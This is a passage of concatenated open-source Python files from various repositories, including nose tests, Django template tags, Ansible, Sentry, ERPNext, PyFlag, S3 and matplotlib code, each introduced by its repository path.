assert 'beforeTest' in plugs.called
assert 'startTest' in plugs.called
assert 'addSuccess' in plugs.called
assert 'stopTest' in plugs.called
assert 'afterTest' in plugs.called
plugs.reset()
def test_stop_on_error(self):
from nose.case import Test
class TC(unittest.TestCase):
def runTest(self):
raise Exception("Enough!")
conf = Config(stopOnError=True)
test = TC()
case = Test(test)
res = unittest.TestResult()
proxy = ResultProxy(res, case, config=conf)
case(proxy)
assert proxy.shouldStop
assert res.shouldStop
def test_coercion_of_custom_exception(self):
from nose.case import Test
class CustomException(Exception):
def __init__(self, message, two, three):
Exception.__init__(self, message)
class TC(unittest.TestCase):
def runTest(self):
pass
test = TC()
case = Test(test)
res = unittest.TestResult()
try:
raise CustomException("the error", 2, 3)
except:
etype, val, tb = sys.exc_info()
val = str(val) # simulate plugin shenanigans
proxy = ResultProxy(res, test=case)
# Python 3 coercion should happen here without error
proxy.addError(test, (etype, val, tb))
proxy.addFailure(test, (etype, val, tb))
if __name__ == '__main__':
unittest.main()
|
octavioturra/aritial
|
refs/heads/master
|
google_appengine/lib/django/django/templatetags/i18n.py
|
33
|
from django.template import Node, resolve_variable
from django.template import TemplateSyntaxError, TokenParser, Library
from django.template import TOKEN_TEXT, TOKEN_VAR
from django.utils import translation
register = Library()
class GetAvailableLanguagesNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
from django.conf import settings
context[self.variable] = [(k, translation.gettext(v)) for k, v in settings.LANGUAGES]
return ''
class GetCurrentLanguageNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language()
return ''
class GetCurrentLanguageBidiNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language_bidi()
return ''
class TranslateNode(Node):
def __init__(self, value, noop):
self.value = value
self.noop = noop
def render(self, context):
value = resolve_variable(self.value, context)
if self.noop:
return value
else:
return translation.gettext(value)
class BlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None, counter=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
def render_token_list(self, tokens):
result = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append('%%(%s)s' % token.contents)
return ''.join(result)
def render(self, context):
context.push()
for var,val in self.extra_context.items():
context[var] = val.resolve(context)
singular = self.render_token_list(self.singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural = self.render_token_list(self.plural)
result = translation.ngettext(singular, plural, count) % context
else:
result = translation.gettext(singular) % context
context.pop()
return result
def do_get_available_languages(parser, token):
"""
This will store a list of available languages
in the context.
Usage::
{% get_available_languages as languages %}
{% for language in languages %}
...
{% endfor %}
This will just pull the LANGUAGES setting from
your setting file (or the default settings) and
put it into the named variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_available_languages' requires 'as variable' (got %r)" % args
return GetAvailableLanguagesNode(args[2])
def do_get_current_language(parser, token):
"""
This will store the current language in the context.
Usage::
{% get_current_language as language %}
This will fetch the currently active language and
put it's value into the ``language`` context
variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_current_language' requires 'as variable' (got %r)" % args
return GetCurrentLanguageNode(args[2])
def do_get_current_language_bidi(parser, token):
"""
This will store the current language layout in the context.
Usage::
{% get_current_language_bidi as bidi %}
This will fetch the currently active language's layout and
put it's value into the ``bidi`` context variable.
True indicates right-to-left layout, otherwise left-to-right
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError, "'get_current_language_bidi' requires 'as variable' (got %r)" % args
return GetCurrentLanguageBidiNode(args[2])
def do_translate(parser, token):
"""
This will mark a string for translation and will
translate the string for the current language.
Usage::
{% trans "this is a test" %}
This will mark the string for translation so it will
be pulled out by mark-messages.py into the .po files
and will run the string through the translation engine.
There is a second form::
{% trans "this is a test" noop %}
This will only mark for translation, but will return
the string unchanged. Use it when you need to store
values into forms that should be translated later on.
You can use variables instead of constant strings
to translate stuff you marked somewhere else::
{% trans variable %}
This will just try to translate the contents of
the variable ``variable``. Make sure that the string
in there is something that is in the .po file.
"""
class TranslateParser(TokenParser):
def top(self):
value = self.value()
if self.more():
if self.tag() == 'noop':
noop = True
else:
raise TemplateSyntaxError, "only option for 'trans' is 'noop'"
else:
noop = False
return (value, noop)
value, noop = TranslateParser(token.contents).top()
return TranslateNode(value, noop)
def do_block_translate(parser, token):
"""
This will translate a block of text with parameters.
Usage::
{% blocktrans with foo|filter as bar and baz|filter as boo %}
This is {{ bar }} and {{ boo }}.
{% endblocktrans %}
Additionally, this supports pluralization::
{% blocktrans count var|length as count %}
There is {{ count }} object.
{% plural %}
There are {{ count }} objects.
{% endblocktrans %}
This is much like ngettext, only in template syntax.
"""
class BlockTranslateParser(TokenParser):
def top(self):
countervar = None
counter = None
extra_context = {}
while self.more():
tag = self.tag()
if tag == 'with' or tag == 'and':
value = self.value()
if self.tag() != 'as':
raise TemplateSyntaxError, "variable bindings in 'blocktrans' must be 'with value as variable'"
extra_context[self.tag()] = parser.compile_filter(value)
elif tag == 'count':
counter = parser.compile_filter(self.value())
if self.tag() != 'as':
raise TemplateSyntaxError, "counter specification in 'blocktrans' must be 'count value as variable'"
countervar = self.tag()
else:
raise TemplateSyntaxError, "unknown subtag %s for 'blocktrans' found" % tag
return (countervar, counter, extra_context)
countervar, counter, extra_context = BlockTranslateParser(token.contents).top()
singular = []
plural = []
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
singular.append(token)
else:
break
if countervar and counter:
if token.contents.strip() != 'plural':
raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags inside it"
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
plural.append(token)
else:
break
if token.contents.strip() != 'endblocktrans':
raise TemplateSyntaxError, "'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents
return BlockTranslateNode(extra_context, singular, plural, countervar, counter)
register.tag('get_available_languages', do_get_available_languages)
register.tag('get_current_language', do_get_current_language)
register.tag('get_current_language_bidi', do_get_current_language_bidi)
register.tag('trans', do_translate)
register.tag('blocktrans', do_block_translate)
|
JackDanger/sentry
|
refs/heads/master
|
src/sentry/search/django/constants.py
|
7
|
"""
sentry.search.django.constants
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
SORT_CLAUSES = {
'priority': 'sentry_groupedmessage.score',
'date': 'EXTRACT(EPOCH FROM sentry_groupedmessage.last_seen)::int',
'new': 'EXTRACT(EPOCH FROM sentry_groupedmessage.first_seen)::int',
'freq': 'sentry_groupedmessage.times_seen',
}
SQLITE_SORT_CLAUSES = SORT_CLAUSES.copy()
SQLITE_SORT_CLAUSES.update({
'date': "cast((julianday(sentry_groupedmessage.last_seen) - 2440587.5) * 86400.0 as INTEGER)",
'new': "cast((julianday(sentry_groupedmessage.first_seen) - 2440587.5) * 86400.0 as INTEGER)",
})
MYSQL_SORT_CLAUSES = SORT_CLAUSES.copy()
MYSQL_SORT_CLAUSES.update({
'date': 'UNIX_TIMESTAMP(sentry_groupedmessage.last_seen)',
'new': 'UNIX_TIMESTAMP(sentry_groupedmessage.first_seen)',
})
ORACLE_SORT_CLAUSES = SORT_CLAUSES.copy()
ORACLE_SORT_CLAUSES.update({
'date': "(cast(sentry_groupedmessage.last_seen as date)-TO_DATE('01/01/1970 00:00:00', 'MM-DD-YYYY HH24:MI:SS')) * 24 * 60 * 60",
'new': "(cast(sentry_groupedmessage.first_seen as date)-TO_DATE('01/01/1970 00:00:00', 'MM-DD-YYYY HH24:MI:SS')) * 24 * 60 * 60",
})
MSSQL_SORT_CLAUSES = SORT_CLAUSES.copy()
MSSQL_SORT_CLAUSES.update({
'date': "DATEDIFF(s, '1970-01-01T00:00:00', sentry_groupedmessage.last_seen)",
'new': "DATEDIFF(s, '1970-01-01T00:00:00', sentry_groupedmessage.first_seen)",
})
MSSQL_ENGINES = set(['django_pytds', 'sqlserver_ado', 'sql_server.pyodbc'])
|
arru/pypegs
|
refs/heads/master
|
pypegs/__init__.py
|
1
|
# pyPEGS
#
# Copyright (c) 2015, Arvid Rudling
# All rights reserved.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
|
brownharryb/erpnext
|
refs/heads/develop
|
erpnext/patches/v4_2/delete_old_print_formats.py
|
120
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
def execute():
old_formats = ("Sales Invoice", "Sales Invoice Spartan", "Sales Invoice Modern",
"Sales Invoice Classic",
"Sales Order Spartan", "Sales Order Modern", "Sales Order Classic",
"Purchase Order Spartan", "Purchase Order Modern", "Purchase Order Classic",
"Quotation Spartan", "Quotation Modern", "Quotation Classic",
"Delivery Note Spartan", "Delivery Note Modern", "Delivery Note Classic")
for fmt in old_formats:
# update property setter
for ps in frappe.db.sql_list("""select name from `tabProperty Setter`
where property='default_print_format' and value=%s""", fmt):
ps = frappe.get_doc("Property Setter", ps)
ps.value = "Standard"
ps.save(ignore_permissions = True)
frappe.delete_doc_if_exists("Print Format", fmt)
|
mudbungie/carrieocoyle
|
refs/heads/master
|
gallery/migrations/0008_remove_piece_medium.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0007_auto_20151027_1103'),
]
operations = [
migrations.RemoveField(
model_name='piece',
name='medium',
),
]
|
blakfeld/ansible
|
refs/heads/devel
|
lib/ansible/plugins/cache/redis.py
|
34
|
# (c) 2014, Brian Coca, Josh Drake, et al
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
# FIXME: can we store these as something else before we ship it?
import sys
import time
import json
from ansible import constants as C
from ansible.plugins.cache.base import BaseCacheModule
try:
from redis import StrictRedis
except ImportError:
print("The 'redis' python module is required, 'pip install redis'")
sys.exit(1)
class CacheModule(BaseCacheModule):
"""
A caching module backed by redis.
Keys are maintained in a zset with their score being the timestamp
when they are inserted. This allows for the usage of 'zremrangebyscore'
to expire keys. This mechanism is used or a pattern matched 'scan' for
performance.
"""
def __init__(self, *args, **kwargs):
if C.CACHE_PLUGIN_CONNECTION:
connection = C.CACHE_PLUGIN_CONNECTION.split(':')
else:
connection = []
self._timeout = float(C.CACHE_PLUGIN_TIMEOUT)
self._prefix = C.CACHE_PLUGIN_PREFIX
self._cache = StrictRedis(*connection)
self._keys_set = 'ansible_cache_keys'
def _make_key(self, key):
return self._prefix + key
def get(self, key):
value = self._cache.get(self._make_key(key))
# guard against the key not being removed from the zset;
# this could happen in cases where the timeout value is changed
# between invocations
if value is None:
self.delete(key)
raise KeyError
return json.loads(value)
def set(self, key, value):
value2 = json.dumps(value)
if self._timeout > 0: # a timeout of 0 is handled as meaning 'never expire'
self._cache.setex(self._make_key(key), int(self._timeout), value2)
else:
self._cache.set(self._make_key(key), value2)
self._cache.zadd(self._keys_set, time.time(), key)
def _expire_keys(self):
if self._timeout > 0:
expiry_age = time.time() - self._timeout
self._cache.zremrangebyscore(self._keys_set, 0, expiry_age)
def keys(self):
self._expire_keys()
return self._cache.zrange(self._keys_set, 0, -1)
def contains(self, key):
self._expire_keys()
return (self._cache.zrank(self._keys_set, key) >= 0)
def delete(self, key):
self._cache.delete(self._make_key(key))
self._cache.zrem(self._keys_set, key)
def flush(self):
for key in self.keys():
self.delete(key)
def copy(self):
# FIXME: there is probably a better way to do this in redis
ret = dict()
for key in self.keys():
ret[key] = self.get(key)
return ret
def __getstate__(self):
return dict()
def __setstate__(self, data):
self.__init__()
|
naototty/pyflag
|
refs/heads/master
|
src/plugins_old/DiskForensics/TimeLine.py
|
5
|
# ******************************************************
# Copyright 2004: Commonwealth of Australia.
#
# Developed by the Computer Network Vulnerability Team,
# Information Security Group.
# Department of Defence.
#
# Michael Cohen <scudette@users.sourceforge.net>
# David Collett <daveco@users.sourceforge.net>
#
# ******************************************************
# Version: FLAG $Version: 0.87-pre1 Date: Thu Jun 12 00:48:38 EST 2008$
# ******************************************************
#
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# ******************************************************
""" PyFlag module for Timeline analysis.
"""
from pyflag.ColumnTypes import IntegerType,TimestampType,FilenameType, StringType, StateType, AFF4URN
### FIXME - this module needs updating!!!!
import pyflag.Reports as Reports
from pyflag.FlagFramework import Curry,query_type
import pyflag.FlagFramework as FlagFramework
import pyflag.conf
config=pyflag.conf.ConfObject()
class MACTimes(FlagFramework.EventHandler):
def create(self, dbh, case):
dbh.execute("""create table if not exists mac(
`inode_id` INT NOT NULL default 0,
`status` varchar(8) default '',
`time` timestamp NOT NULL default '0000-00-00 00:00:00',
`m` int default NULL,
`a` tinyint default NULL,
`c` tinyint default NULL,
`d` tinyint default NULL,
`name` text
) """)
class Timeline(Reports.report):
""" View file MAC times in a searchable table """
name = "View File Timeline"
family = "Disk Forensics"
description = "Browse file creation, modification, and access times"
def form(self, query, result):
result.case_selector()
def analyse(self, query):
dbh = self.DBO(query['case'])
temp_table = dbh.get_temp()
dbh.check_index("inode","inode")
dbh.execute("create temporary table %s select i.inode_id,f.status,mtime as `time`,1 as `m`,0 as `a`,0 as `c`,0 as `d`,concat(path,name) as `name` from inode as i left join file as f on i.inode=f.inode" %
(temp_table, ));
dbh.execute("insert into %s select i.inode_id,f.status,atime,0,1,0,0,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table,))
dbh.execute("insert into %s select i.inode_id,f.status,ctime,0,0,1,0,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table, ))
dbh.execute("insert into %s select i.inode_id,f.status,dtime,0,0,0,1,concat(path,name) from inode as i left join file as f on i.inode_id=f.inode_id" % (temp_table, ))
dbh.execute("insert into mac select inode_id,status,time,sum(m) as `m`,sum(a) as `a`,sum(c) as `c`,sum(d) as `d`,name from %s where time>0 group by time,name order by time,name" % temp_table)
dbh.check_index("mac","inode_id")
def progress(self, query, result):
result.heading("Building Timeline")
def display(self, query, result):
dbh = self.DBO(query['case'])
result.heading("File Timeline for Filesystem")
result.table(
elements=[ TimestampType('Timestamp','time'),
AFF4URN(case=query['case']),
DeletedType(),
BinaryType('m',"m"),
BinaryType('a',"a"),
BinaryType('c',"c"),
BinaryType('d',"d"),
FilenameType(),
],
table='mac',
case=query['case'],
)
def reset(self, query):
dbh = self.DBO(query['case'])
dbh.execute("drop table mac")
|
mmccoo/kicad_mmccoo
|
refs/heads/master
|
svg2border/test_parser.py
|
1
|
import inspect
import sys, os.path
oldpath = sys.path
# inspect.stack()[0][1] is the full path to the current file.
sys.path.insert(0, os.path.dirname(inspect.stack()[0][1]))
import parse_svg_path
sys.path = oldpath
paths = parse_svg_path.parse_svg_path('/home/mmccoo/kicad/kicad_mmccoo/svg2border/drawing.svg')
for path in paths:
print("path {}".format(parse_svg_path.path_bbox(path)))
#for poly in path.polys:
#print(" points {}".format(poly))
#print(" is hole {}".format(parse_svg_path.poly_is_hole(poly)))
# print(" points 18{}".format(poly))
for shape in path.group_by_bound_and_holes():
print("bounds: {}".format(shape.bound))
print("with holes:")
for hole in shape.holes:
print(" hole: {}".format(hole))
|
sreichholf/python-coherence
|
refs/heads/develop
|
coherence/extern/db_row.py
|
2
|
# Wraps DB-API 2.0 query results to provide a nice list and dictionary interface.
# Copyright (C) 2002 Dr. Conan C. Albrecht <conan_albrecht@byu.edu>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# I created this class and related functions because I like accessing
# database results by field name rather than field number. Accessing
# by field number has many problems: code is less readable, code gets
# broken when field positions change or fields are added or deleted from
# the query, etc.
#
# This class should have little overhead if you are already using fetchall().
# It wraps each result row in a ResultRow class which allows you to
# retrieve results via a dictionary interface (by column name). The regular
# list interface (by column number) is also provided.
#
# I can't believe the DB-API 2.0 api didn't include dictionary-style results.
# I'd love to see the reasoning behind not requiring them of database connection
# classes.
# This module comes from:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/163605
def get_rows(cursor, sql):
"""Return a list of ResultRow objects from an SQL query."""
# run the query
cursor.execute(sql)
# return the list
return getdict(cursor.fetchall(), cursor.description)
def getdict(results, description):
"""Return the list of DBRows in `results` with a given description."""
# get the field names
fields = {}
for i in range(len(description)):
fields[description[i][0]] = i
# generate the list of DBRow objects
rows = []
for result in results:
rows.append(DBRow(result, fields))
# return to the user
return rows
class DBRow(object):
"""A single row in a result set.
Each DBRow has a dictionary-style and list-style interface.
"""
def __init__(self, row, fields):
"""Called by ResultSet function. Don't call directly"""
self.fields = fields
self.row = row
self._extra_fields = {}
def __repr__(self):
return "<DBrow with %s fields>" % len(self)
def __str__(self):
"""Return a string representation"""
return str(self.row)
def __getattr__(self, attr):
return self.row[self.fields[attr]]
def set_extra_attr(self, attr, value):
self._extra_fields[attr] = value
def __getitem__(self, key):
"""Return the value of the named column"""
if type(key) == type(1): # if a number
return self.row[key]
else: # a field name
return self.row[self.fields[key]]
def __setitem__(self, key, value):
"""Not used in this implementation"""
raise TypeError("can't set an item of a result set")
def __getslice__(self, i, j):
"""Return the value of the numbered column"""
return self.row[i: j]
def __setslice__(self, i, j, list):
"""Not used in this implementation"""
raise TypeError("can't set an item of a result set")
def keys(self):
"""Return the field names"""
return self.fields.keys()
def keymappings(self):
"""Return a dictionary of the keys and their indices in the row"""
return self.fields
def has_key(self, key):
"""Return whether the given key is valid"""
return self.fields.has_key(key)
def as_dict(self):
d = {}
for field_name, pos in self.fields.iteritems():
d[field_name] = self.row[pos]
for field_name, field in self._extra_fields.iteritems():
d[field_name] = field
return d
def __len__(self):
"""Return how many columns are in this row"""
return len(self.row)
def __nonzero__(self):
return len(self.row) != 0
def __eq__(self, other):
## Error if other is not set
if other == None:
return False
return self.fields == other.fields
|
rob-hills/Booktype
|
refs/heads/2.0
|
lib/booktype/apps/reader/forms.py
|
2
|
from django import forms
from booki.editor.models import Book
from django.utils.translation import ugettext_lazy as _
from booktype.apps.core.forms import BaseBooktypeForm
class EditBookInfoForm(BaseBooktypeForm, forms.ModelForm):
description = forms.CharField(
label=_("Book description"),
required=False,
widget=forms.Textarea(attrs={'style': "width: 100%; height: 210px;"})
)
book_cover = forms.ImageField(
label=_("Book image"),
required=False
)
hidden = forms.BooleanField(
label=_('Initially hide from others'),
required=False
)
class Meta:
model = Book
exclude = [
'url_title', 'title',
'status', 'language',
'version', 'group',
'created', 'published',
'permission', 'cover'
]
fields = [
'description', 'book_cover',
'owner', 'license', 'hidden'
]
def __init__(self, user, *args, **kwargs):
super(EditBookInfoForm, self).__init__(*args, **kwargs)
if not user.is_superuser:
del self.fields['owner']
|
mredar/django-dublincore
|
refs/heads/master
|
test_project/test_project/wsgi.py
|
73
|
"""
WSGI config for test_project project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_project.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
qpython-android/QPypi-numpy
|
refs/heads/master
|
numpy/distutils/command/bdist_rpm.py
|
101
|
import os
import sys
if 'setuptools' in sys.modules:
from setuptools.command.bdist_rpm import bdist_rpm as old_bdist_rpm
else:
from distutils.command.bdist_rpm import bdist_rpm as old_bdist_rpm
class bdist_rpm(old_bdist_rpm):
def _make_spec_file(self):
spec_file = old_bdist_rpm._make_spec_file(self)
# Replace hardcoded setup.py script name
# with the real setup script name.
setup_py = os.path.basename(sys.argv[0])
if setup_py == 'setup.py':
return spec_file
new_spec_file = []
for line in spec_file:
line = line.replace('setup.py',setup_py)
new_spec_file.append(line)
return new_spec_file
|
cactusbin/nyt
|
refs/heads/master
|
matplotlib/doc/pyplots/whats_new_98_4_fancy.py
|
6
|
import matplotlib.patches as mpatch
import matplotlib.pyplot as plt
figheight = 8
fig = plt.figure(1, figsize=(9, figheight), dpi=80)
fontsize = 0.4 * fig.dpi
def make_boxstyles(ax):
styles = mpatch.BoxStyle.get_styles()
for i, (stylename, styleclass) in enumerate(styles.items()):
ax.text(0.5, (float(len(styles)) - 0.5 - i)/len(styles), stylename,
ha="center",
size=fontsize,
transform=ax.transAxes,
bbox=dict(boxstyle=stylename, fc="w", ec="k"))
def make_arrowstyles(ax):
styles = mpatch.ArrowStyle.get_styles()
ax.set_xlim(0, 4)
ax.set_ylim(0, figheight)
for i, (stylename, styleclass) in enumerate(sorted(styles.items())):
y = (float(len(styles)) -0.25 - i) # /figheight
p = mpatch.Circle((3.2, y), 0.2, fc="w")
ax.add_patch(p)
ax.annotate(stylename, (3.2, y),
(2., y),
#xycoords="figure fraction", textcoords="figure fraction",
ha="right", va="center",
size=fontsize,
arrowprops=dict(arrowstyle=stylename,
patchB=p,
shrinkA=5,
shrinkB=5,
fc="w", ec="k",
connectionstyle="arc3,rad=-0.05",
),
bbox=dict(boxstyle="square", fc="w"))
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
ax1 = fig.add_subplot(121, frameon=False, xticks=[], yticks=[])
make_boxstyles(ax1)
ax2 = fig.add_subplot(122, frameon=False, xticks=[], yticks=[])
make_arrowstyles(ax2)
plt.show()
|
yetercatikkas/ulakbus
|
refs/heads/master
|
ulakbus/lib/s3_file_manager.py
|
1
|
# -*- coding: utf-8 -*-
"""
"""
# Copyright (C) 2015 ZetaOps Inc.
#
# This file is licensed under the GNU General Public License v3
# (GPLv3). See LICENSE.txt for details.
import base64
import os
from uuid import uuid4
from boto.s3.connection import S3Connection as s3
from boto.s3.key import Key
from pyoko.conf import settings
class S3FileManager(object):
def __init__(self):
self.conn = s3(aws_access_key_id=settings.S3_ACCESS_KEY,
aws_secret_access_key=settings.S3_SECRET_KEY,
proxy=settings.S3_PROXY_URL,
proxy_port=settings.S3_PROXY_PORT,
is_secure=False)
def store_file(self, **kwargs):
bucket = self.conn.get_bucket(settings.S3_BUCKET_NAME)
content = kwargs['content']
k = Key(bucket)
filename = None
if 'name' in kwargs:
filename, extension = os.path.splitext(kwargs['name'])
extension = extension.replace('.', '')
if 'ext' in kwargs:
extension = kwargs['ext']
typ, ext = settings.ALLOWED_FILE_TYPES[extension]
if "type" in kwargs:
typ = kwargs['type']
if 'random_name' in kwargs:
filename = None
k.key = "%s.%s" % (filename or uuid4().hex, ext)
k.content_type = typ
content = base64.decodestring(content.split('base64,')[1])
k.set_contents_from_string(content)
bucket.set_acl('public-read', k.key)
return k.key
@staticmethod
def get_url(key):
return "%s%s" % (settings.S3_PUBLIC_URL, key)
|
UManPychron/pychron
|
refs/heads/develop
|
docs/user_guide/operation/scripts/examples/helix/measurement/felix_analysis120_60_no_center.py
|
2
|
#!Measurement
'''
baseline:
after: true
before: false
counts: 60
detector: H2
mass: 40.062
settling_time: 15.0
default_fits: nominal
equilibration:
eqtime: 1.0
inlet: H
inlet_delay: 3
outlet: V
use_extraction_eqtime: true
multicollect:
counts: 120
detector: H2
isotope: Ar40
peakcenter:
after: false
before: false
detector: H2
detectors:
- H1
- L2(CDD)
isotope: Ar40
integration_time: 1.048576
peakhop:
hops_name: ''
use_peak_hop: false
'''
ACTIVE_DETECTORS=('H2','H1','AX','L1','L2(CDD)')
def main():
info('unknown measurement script')
activate_detectors(*ACTIVE_DETECTORS)
if mx.peakcenter.before:
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope)
if mx.baseline.before:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
position_magnet(mx.multicollect.isotope, detector=mx.multicollect.detector)
#sniff the gas during equilibration
if mx.equilibration.use_extraction_eqtime:
eqt = eqtime
else:
eqt = mx.equilibration.eqtime
'''
Equilibrate is non-blocking so use a sniff or sleep as a placeholder
e.g sniff(<equilibration_time>) or sleep(<equilibration_time>)
'''
equilibrate(eqtime=eqt, inlet=mx.equilibration.inlet, outlet=mx.equilibration.outlet,
delay=mx.equilibration.inlet_delay)
set_time_zero()
sniff(eqt)
set_fits()
set_baseline_fits()
#multicollect on active detectors
multicollect(ncounts=mx.multicollect.counts, integration_time=1.048576)
if mx.baseline.after:
baselines(ncounts=mx.baseline.counts,mass=mx.baseline.mass, detector=mx.baseline.detector,
settling_time=mx.baseline.settling_time)
if mx.peakcenter.after:
activate_detectors(*mx.peakcenter.detectors, **{'peak_center':True})
peak_center(detector=mx.peakcenter.detector,isotope=mx.peakcenter.isotope,
integration_time=mx.peakcenter.integration_time)
if use_cdd_warming:
gosub('warm_cdd', argv=(mx.equilibration.outlet,))
info('finished measure script')
|
XDATA-Year-3/clique-anb
|
refs/heads/master
|
src/assets/tangelo/anb/get_nodes.py
|
1
|
from pymongo import MongoClient
def run(host=None, db=None, coll=None, filename=None):
client = MongoClient(host)
db = client[db]
graph = db[coll]
return graph.distinct("data.label", {"type": "node",
"data.filename": filename})
|
adieu/django-nonrel
|
refs/heads/master
|
django/contrib/gis/gdal/error.py
|
466
|
"""
This module houses the OGR & SRS Exception objects, and the
check_err() routine which checks the status code returned by
OGR methods.
"""
#### OGR & SRS Exceptions ####
class GDALException(Exception): pass
class OGRException(Exception): pass
class SRSException(Exception): pass
class OGRIndexError(OGRException, KeyError):
"""
This exception is raised when an invalid index is encountered, and has
the 'silent_variable_feature' attribute set to true. This ensures that
django's templates proceed to use the next lookup type gracefully when
an Exception is raised. Fixes ticket #4740.
"""
silent_variable_failure = True
#### OGR error checking codes and routine ####
# OGR Error Codes
OGRERR_DICT = { 1 : (OGRException, 'Not enough data.'),
2 : (OGRException, 'Not enough memory.'),
3 : (OGRException, 'Unsupported geometry type.'),
4 : (OGRException, 'Unsupported operation.'),
5 : (OGRException, 'Corrupt data.'),
6 : (OGRException, 'OGR failure.'),
7 : (SRSException, 'Unsupported SRS.'),
8 : (OGRException, 'Invalid handle.'),
}
OGRERR_NONE = 0
def check_err(code):
"Checks the given OGRERR, and raises an exception where appropriate."
if code == OGRERR_NONE:
return
elif code in OGRERR_DICT:
e, msg = OGRERR_DICT[code]
raise e(msg)
else:
raise OGRException('Unknown error code: "%s"' % code)
|
FluffyMortain/heekscnc
|
refs/heads/master
|
pycnc/Operation.py
|
24
|
from Object import Object
from consts import *
import HeeksCNC
from CNCConfig import CNCConfig
class Operation(Object):
def __init__(self):
Object.__init__(self)
self.active = True
self.comment = ''
self.title = self.TypeName()
self.tool_number = 0
def TypeName(self):
return "Operation"
def icon(self):
# the name of the PNG file in the HeeksCNC icons folder
if self.active:
return self.op_icon()
else:
return "noentry"
def CanBeDeleted(self):
return True
def UsesTool(self): # some operations don't use the tool number
return True
def ReadDefaultValues(self):
config = CNCConfig()
self.tool_number = config.ReadInt("OpTool", 0)
if self.tool_number != 0:
default_tool = HeeksCNC.program.tools.FindTool(self.tool_number)
if default_tool == None:
self.tool_number = 0
else:
self.tool_number = default_tool.tool_number
if self.tool_number == 0:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_SLOTCUTTER)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_ENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
else:
first_tool = HeeksCNC.program.tools.FindFirstTool(TOOL_TYPE_BALLENDMILL)
if first_tool:
self.tool_number = first_tool.tool_number
def WriteDefaultValues(self):
config = CNCConfig()
if self.tool_number != 0:
config.WriteInt("OpTool", self.tool_number)
def AppendTextToProgram(self):
